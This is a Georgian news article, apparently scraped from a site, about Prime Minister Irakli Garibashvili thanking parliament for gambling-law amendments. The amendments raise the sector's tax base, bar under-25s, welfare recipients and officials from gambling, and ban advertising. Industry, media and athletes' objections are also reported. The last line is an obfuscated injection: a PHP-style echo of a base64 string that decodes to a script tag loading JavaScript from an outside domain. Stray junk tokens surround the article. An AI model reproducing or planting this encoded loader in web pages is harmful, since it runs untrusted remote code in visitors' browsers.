celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი პარლამენტს მის მიერ ინიცირებული ცვლილებების მიღებისთვის მადლობას უხდის.
 
საქმე ეხება აზარტულ თამაშებთან დაკავშირებით მიღებულ ცვლილებებს, რომელიც უმაღლესმა საკანონმდებლო ორგანომ სამი მოსმენით, დაჩქარებული განხილვის შემდეგ მიიღო.
 
"პარლამენტმა მესამე მოსმენით მიიღო ჩემ მიერ ინიცირებული ცვლილებები, რომელიც ონლაინ სათამაშო ბიზნესის საქმიანობას არეგულირებს.
 
2022 წლის 1-ელი იანვრიდან, სექტორის დასაბეგრი ბაზა გაიზრდება 65-70%-ით.
 
1-ელი მარტიდან აზარტულ თამაშებში მონაწილეობის მიღება აეკრძალებათ 25 წლამდე მოქალაქეებს, სახელმწიფო შემწეობის მიმღებ სოციალურად დაუცველ პირებს, საჯარო მოხელეებს, პირებს, რომლებიც მიმართავენ ფინანსთა სამინისტროს შემოსავლების სამსახურს თვითშეზღუდვის მექანიზმის გამოყენების მოთხოვნით, ასევე მათ, ვინც მოხვდებიან ე.წ. „შავ სიაში“ სასამართლო გადაწყვეტილების საფუძველზე ან ოჯახის წევრების მოთხოვნით.
 
ჯამში, აზარტულ თამაშებზე წვდომა 1 მილიონამდე სრულწლოვან მოქალაქეს შეეზღუდება.
 
1 მარტიდან, მკაცრდება კონტროლის მექანიზმებიც.
 
აიკრძალება სათამაშო ბიზნესის სატელევიზიო და გარე რეკლამა, ასევე - რეკლამის განთავსება ქართულ ვებგვერდებზე.
სათამაშო ბიზნესის ოპერატორებისთვის დასაშვები იქნება მხოლოდ სპონსორობის ხელშეკრულების გაფორმება.
 
მინდა, მადლობა გადავუხადო პარლამენტს კანონპროექტის დაჩქარებული წესით განხილვისა და მხარდაჭერისთვის.
 
მადლობას ვუხდი ჩვენს ხალხს, ვინც პირველივე დღიდან უჭერს მხარს ამ დიდი საზოგადობრივი მნიშვნელობის ინიციატივას, რომელიც ერთადერთ მიზანს - ჩვენს მოქალაქეებზე, განსაკუთრებით - ახალგაზრდებზე, მომავალ თაობებზე ზრუნვას ისახავს", - წერს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი facebook-ში თავის გვერდზე.
 
შეგახსენებთ: ცვლილება შევიდა „ლატარიების, აზარტული და მომგებიანი თამაშობების მოწყობის შესახებ“ საქართველოს კანონში. საკომიტეტო მოსმენებს დარგის წარმომადგენლები და მედიაც ესწრებოდა. ორივე ბიზნესის წარმომადგენლები კანონის შერბილებას და მისი ამოქმედების ვადების გადაწევას ითხოვდა.
 
მედიის წარმომადგენლებმა პარლამენტს კანონპროექტის თავიანთი ვარიანტიც გადაუგზავნეს, თუმცა „პოლიტიკური გადაწყვეტილება მიღებულია, არსებით განხილვას აზრი არ აქვს’, - უპასუხა დარგობრივი ეკონომიკისა და ეკონომიკური პოლიტიკირ კომიტეტის თავმჯდომარემ, დავით სონღულაშვილმა მათ.
 
რაც შეეხება აზარტული ბიზნესის წარმომადგენლებს. ისინი ამბობენ, რომ კანონის მიღება მოთამაშეების საზღვარგარეთ გადამისამართებას გამოიწვევს და ბიუჯეტი მილიონებს დაკარგავს, ხოლო თავის მხრივ, გადახადადების გადახდა ძალიან
გაუჭირდებათ.
 
აზარტულ ბიზნესს სოლიდარობა გამოუცხადეს სპორტსმენებმა, მსოფლიო და ოლიმპიურმა ჩემპიონებმა. მათი თქმით, დაფინანსების გარეშე საზღვარგარეთ მოუწევთ წასვლა.
894
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");